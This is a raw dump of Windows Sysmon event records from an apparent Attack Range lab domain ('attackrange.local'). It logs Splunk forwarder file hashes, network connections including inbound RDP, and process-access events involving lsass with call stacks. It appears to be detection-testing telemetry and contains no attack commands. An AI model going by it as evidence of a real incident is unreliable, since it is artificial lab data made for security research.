23542300x80000000000000001045775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:34.122{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7876B409DD10DD9EC419CAB5663FC222,SHA256=0A907B7416DBFB92D76EAD9D6D217BA4ED72EB4C011B620CD7DF39393D4FB05B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:35.858{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D55C1D5F27FF634781B468BD4689F671,SHA256=DF2CD03C5D69EE712C99D36196458F62E4F613CCDC12A73AB8EF3F13C6BE4C0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B3D0DCE74CADA78064CDC1545F63271,SHA256=F4861E7AF20F0BECF8879F469248BA40493610F908D519BB9173E88BE04EE687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A8C83559D34EDEE4F290BF4559D0B23,SHA256=52C207B6150F385A99C76A68862C2D412C73961F596CAC52F8A7F6F6DA6DC989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.137{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AEDC217BF56AB42A15BA68910C0E0B5,SHA256=C737BDD26B3510035811922F0F395ADBD23CC89FD40811A2B47021090E459403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:36.874{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D66BC6D51B327169087CA0BD1CDB46,SHA256=B5973523151579EFCB612921D6D75117E63AEFFF2ECEC5C4D6561DDED861947D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:29.313{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57148-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001045779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:36.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5949E194787D7593BEB25296FD0854D,SHA256=E81394AB1AD81666705F4AF46ED825BF6C662FF452FDD6255CD85BFF1604666A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:35.624{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-25037-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 
354300x8000000000000000806007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:34.398{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57147-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:36.765{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DC534C9AA5222E16143A8DB6E712EF5,SHA256=E77F7BF9A4A9657441FAC2D5AADF43AC793238432AF7D551AD803B47B1446374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:36.765{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=027AD932C80E6D5AD96B537FC0F3544E,SHA256=D80CCAC1B13D8F91027D8C075E06DB8619394BF1108F219E45D833F6011287FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:37.875{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EC71181C180CB9C0215A2ED43BB9B6B,SHA256=0C482228139B4D03EC0542F334680738A56030FBA013A56EEC15BF072CC377FF,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000806010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:35.908{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57148-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001045781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:37.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345A2988F2C573D4B952A21B4CD7127E,SHA256=55695CA27721B796FD12D43A0C29272DC8C4F9D56B91077D78BEA4FE7C156C07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:38.888{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C87426BB0E86B3FF16148676234A57,SHA256=8BCD4AD80BF95528E298338C5004A100D7D15555A70B1EAF18AB928F90BB37EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:38.436{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=869F72B7831B27B8C703E55BB38D8D1F,SHA256=5CB0AAE7AB5539AF6E3B88D7723C0588B64A7F53984B14ACA45486BACA49571E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:38.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BDC5A8C1F0CDB526ADD68E30C062B1,SHA256=6C6D6D54039DDEBDE6E373C998E0F134FDB48C3C67F3007248A94096F46E2027,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:29.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50894-false10.0.1.12-8000- 23542300x8000000000000000806013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:39.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85C5B03DE50A49C066E115F2D180A30F,SHA256=E4FA9DEC11DB49E3D3AEC60C9E02B44900A2B78520878D01053BFC4C8516B49B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:39.250{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F45EC4EB0B959C959E3CBCB83CB55139,SHA256=BA93C2B31A7BD70B9F91987EFD4F3274CC4175F5EA4B87D6F8354330991A0917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:40.934{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC16AF42397E68B384BD3BD492E644F8,SHA256=1E3C0D4AAD4C832B13F83A4BDC4AB4F74159B80976CABA56677652EA81EEC2EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:40.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C582DAB143D6DF88C36C2FE3DB45CF8,SHA256=A65E5CA5B7A8C06497E5F41F3AA77D849A010AD874B7880B2F6992F16013C097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:41.934{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5026DC0A9377B6A74252C10515A45E52,SHA256=64628620CCAFD48EA6668AD1120263AE086B9A8D92FD1374A7605A20344345B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:41.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:41.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=316FF4602A79E0B4846210C0B36C7A2A,SHA256=BE648042DB98765170AD8F67AA16FC282F3CD21832EDB5BD9881EAE6F7B67356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:42.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE0C692891293D8A74DB90F6D58DB5B0,SHA256=D302EBEB84FC7A024656D3824A759ABCF771B799581A2245C6D5F85A301E0FFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.588{466BC892-02AD-60E8-0A00-00000000CF01}6163760C:\Windows\system32\services.exe{466BC892-F2AE-60EB-E57C-00000000CF01}3908C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.567{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F2AE-60EB-E57C-00000000CF01}3908C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.567{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F2AE-60EB-E57C-00000000CF01}3908C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+17f9d|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.552{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001045812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-F2AE-60EB-E47C-00000000CF01}6836C:\Windows\System32\taskhostw.exeC:\Users\bob\AppData\Local\Temp\RDR7774.tmp\empty.txt2021-07-12 07:43:42.552 10341000x80000000000000001045811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.505{466BC892-F2AE-60EB-E47C-00000000CF01}68369920C:\Windows\System32\taskhostw.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radarrs.dll+b7b9|C:\Windows\system32\radarrs.dll+7579|C:\Windows\system32\radarrs.dll+5d54|C:\Windows\System32\wdi.dll+1eea|C:\Windows\System32\wdi.dll+6e21|C:\Windows\System32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.505{466BC892-F2AE-60EB-E47C-00000000CF01}68369920C:\Windows\System32\taskhostw.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radarrs.dll+b4b9|C:\Windows\system32\radarrs.dll+7514|C:\Windows\system32\radarrs.dll+5d54|C:\Windows\System32\wdi.dll+1eea|C:\Windows\System32\wdi.dll+6e21|C:\Windows\System32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
